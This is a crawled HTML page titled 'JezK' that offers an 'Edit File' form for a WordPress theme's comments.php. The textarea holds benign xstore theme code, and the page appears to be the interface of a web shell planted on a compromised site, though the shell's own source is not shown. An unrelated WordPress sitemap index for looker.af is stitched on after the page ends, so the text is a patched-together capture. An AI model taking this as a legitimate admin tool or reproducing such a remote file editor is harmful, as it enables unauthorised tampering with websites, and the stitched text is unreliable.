
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: comments.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
	// Prevent the direct loading

	defined( &#039;ABSPATH&#039; ) || exit( &#039;Direct script access denied.&#039; );

	// Check if post is pwd protected
	if(post_password_required()){
		?&gt;
		&lt;p&gt;&lt;?php esc_html_e(&#039;This post is password protected. Enter the password to view the comments.&#039;, &#039;xstore&#039;); ?&gt;&lt;/p&gt;
		&lt;?php
		return;
	}

	if(have_comments()) :?&gt;
		&lt;div class=&quot;comments&quot;&gt;
			&lt;h4 class=&quot;title-alt&quot;&gt;
			&lt;span&gt;
				&lt;?php
				$comments_number = get_comments_number();
				if ( &#039;1&#039; === $comments_number ) {
					printf(
						/* translators: 1: title. */
						esc_html__( &#039;One comment on &amp;ldquo;%1$s&amp;rdquo;&#039;, &#039;xstore&#039; ),
						&#039;&lt;span&gt;&#039; . wp_kses_post( get_the_title() ) . &#039;&lt;/span&gt;&#039;
					);
				} else {
					printf( 
						/* translators: 1: comment count number, 2: title. */
						esc_html( _nx( &#039;%1$s comment on &amp;ldquo;%2$s&amp;rdquo;&#039;, &#039;%1$s comments on &amp;ldquo;%2$s&amp;rdquo;&#039;, $comments_number, &#039;comments title&#039;, &#039;xstore&#039; ) ),
						number_format_i18n( $comments_number ), // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
						&#039;&lt;span&gt;&#039; . wp_kses_post( get_the_title() ) . &#039;&lt;/span&gt;&#039;
					);
				}
				?&gt;
			&lt;/span&gt;
			&lt;/h4&gt;

			&lt;ul class=&quot;comments-list&quot;&gt;
				&lt;?php wp_list_comments(&#039;callback=etheme_comments&#039;); ?&gt;
			&lt;/ul&gt;

			&lt;?php if (get_comment_pages_count() &gt; 1 &amp;&amp; get_option(&#039;page_comments&#039;)): ?&gt;

				&lt;div class=&quot;comments-nav&quot;&gt;
					&lt;div class=&quot;pull-left&quot;&gt;&lt;?php previous_comments_link(esc_html__(&#039;&amp;larr; Older Comments&#039;, &#039;xstore&#039;)); ?&gt;&lt;/div&gt;
					&lt;div class=&quot;pull-right&quot;&gt;&lt;?php next_comments_link(esc_html__(&#039;Newer Comments &amp;rarr;&#039;, &#039;xstore&#039;)); ?&gt;&lt;/div&gt;
					&lt;div class=&quot;clear&quot;&gt;&lt;/div&gt;
				&lt;/div&gt;

			&lt;?php endif ?&gt;

		&lt;/div&gt;

	&lt;?php elseif(!comments_open() &amp;&amp; !is_page() &amp;&amp; post_type_supports(get_post_type(), &#039;comments&#039;)) : ?&gt;

		&lt;p class=&quot;no-comments&quot;&gt;&lt;?php esc_html_e(&#039;Comments are closed&#039;, &#039;xstore&#039;) ?&gt;&lt;/p&gt;

		&lt;?php
	endif;

	// Display Comment Form
	comment_form(array(&#039;title_reply&#039; =&gt; &#039;&lt;span&gt;&#039; . esc_html__(&#039;Leave a reply&#039;, &#039;xstore&#039;) . &#039;&lt;/span&gt;&#039;));
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
